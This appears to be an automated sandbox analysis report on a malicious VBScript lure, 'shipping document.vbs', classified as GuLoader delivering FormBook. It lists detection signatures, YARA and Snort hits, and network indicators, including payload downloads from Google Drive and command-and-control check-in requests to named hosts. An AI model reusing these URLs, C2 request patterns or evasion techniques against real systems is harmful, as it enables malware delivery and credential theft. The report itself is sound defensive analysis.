Windows Analysis Report
shipping document.vbs

Overview

General Information

Sample name: shipping document.vbs
Analysis ID: 1430120
MD5: 1dce662b3782fbec7c5f4f73d8e63f41
SHA1: 25cf442e9e62d5a83dd81c980da84c5ec27dac75
SHA256: 35b1922951d049fedf34ebd18d57fd8acccaf65e462c6dc6308f5d63e17381ee
Tags: vbs
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Creates autostart registry keys with suspicious names
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: shipping document.vbs ReversingLabs: Detection: 31%
Source: shipping document.vbs Virustotal: Detection: 40% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49716 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000009.00000002.1926528931.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbD9%m! source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000009.00000002.1938944597.0000000008184000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb: source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp
Source: Binary string: wab.pdb source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49719 -> 80.240.20.220:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 157.7.107.63:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49721 -> 157.7.107.63:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49723 -> 157.7.107.63:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 172.217.16.36:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /3g97/?Z0cP=R2YdndZh2B6&jJEDgF=0byNfP8xYbFTvv3QATAnaN6BV2N8MY8k+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhJjDvkLInRorT+v+nJR1Y5dgJEbJjbg== HTTP/1.1Host: www.jthzbrdb.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic HTTP traffic detected: GET /3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6 HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: unknown HTTP traffic detected: POST /3g97/ HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 195Cache-Control: max-age=0Origin: http://www.a-two-spa-salon.comReferer: http://www.a-two-spa-salon.com/3g97/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Data Raw: 6a 4a 45 44 67 46 3d 34 36 6a 39 69 4f 35 61 67 71 4d 35 72 4d 78 46 39 53 47 65 4f 74 31 68 4e 66 42 67 4f 2b 75 6d 48 71 34 64 4c 4a 67 6b 4b 52 42 31 65 38 64 2f 50 6e 43 4f 58 73 31 2b 51 34 69 74 33 74 6a 61 6a 77 61 5a 53 50 70 6e 66 63 32 32 5a 7a 4f 50 45 42 62 51 61 6c 62 58 67 50 6a 71 6e 69 6e 54 2f 55 34 34 59 57 39 72 57 6d 58 4a 55 77 39 55 79 77 30 5a 56 2b 54 44 6e 41 4f 36 64 68 46 57 2f 49 72 62 47 71 72 62 46 4c 47 73 4e 37 39 57 34 46 55 35 2f 7a 66 6e 66 41 30 56 75 67 74 70 51 37 78 49 46 53 59 46 41 34 39 70 4c 37 42 50 49 34 74 7a 32 6e 50 69 64 74 4a 73 Data Ascii: jJEDgF=46j9iO5agqM5rMxF9SGeOt1hNfBgO+umHq4dLJgkKRB1e8d/PnCOXs1+Q4it3tjajwaZSPpnfc22ZzOPEBbQalbXgPjqninT/U44YW9rWmXJUw9Uyw0ZV+TDnAO6dhFW/IrbGqrbFLGsN79W4FU5/zfnfA0VugtpQ7xIFSYFA49pL7BPI4tz2nPidtJs
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 05:54:55 GMTContent-Type: text/htmlContent-Length: 1409Connection: closeVary: Accept-EncodingETag: "629dd94c-581"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 33 62 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74
Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
